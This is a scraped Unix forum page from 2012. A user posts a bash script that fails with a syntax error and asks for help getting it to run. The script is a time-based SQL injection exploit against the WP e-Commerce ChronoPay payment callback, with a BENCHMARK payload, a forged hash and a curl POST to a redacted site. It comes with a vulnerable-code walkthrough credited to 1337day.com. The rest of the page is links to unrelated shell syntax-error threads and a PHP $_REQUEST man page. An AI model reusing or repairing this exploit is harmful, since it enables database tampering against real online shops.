Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Syntax error near unexpected token `('
Top Forums Shell Programming and Scripting Syntax error near unexpected token `(' Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Old 05-02-2012
Syntax error near unexpected token `('
What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
 

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

8. How to Post in the The UNIX and Linux Forums

Syntax error near unexpected token `('

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

Syntax error near unexpected token `('

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies

LEARN ABOUT PHP

_request

_REQUEST(3)								 1							       _REQUEST(3)

$_REQUEST - HTTP Request variables

	An associative array that by default contains the contents of $_GET, $_POST and $_COOKIE.

       +--------+---------------------------------------------------+
       |Version |						    |
       |	|						    |
       |	|		     Description		    |
       |	|						    |
       +--------+---------------------------------------------------+
       | 5.3.0	|						    |
       |	|						    |
       |	|  Introduced request_order. This directive affects |
       |	| the contents of $_REQUEST.			    |
       |	|						    |
       | 4.3.0	|						    |
       |	|						    |
       |	|  $_FILES information was removed from $_REQUEST.  |
       |	|						    |
       | 4.1.0	|						    |
       |	|						    |
       |	|		Introduced $_REQUEST.		    |
       |	|						    |
       +--------+---------------------------------------------------+
       Note

	      This is a 'superglobal', or automatic global, variable. This simply means that it is available in all scopes  throughout	a  script.
	      There is no need to do global $variable; to access it within functions or methods.

       Note

	       When running on the command line , this will not include the argv and argc entries; these are present in the $_SERVER array.

       Note

	       The  variables  in $_REQUEST are provided to the script via the GET, POST, and COOKIE input mechanisms and therefore could be modi-
	      fied by the remote user and cannot be trusted. The presence and order of variables listed in this array is defined according to  the
	      PHP variables_order configuration directive.

       import_request_variables(3), Handling external variables, The filter extension.

PHP Documentation Group 													       _REQUEST(3)
All times are GMT -4. The time now is 08:52 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy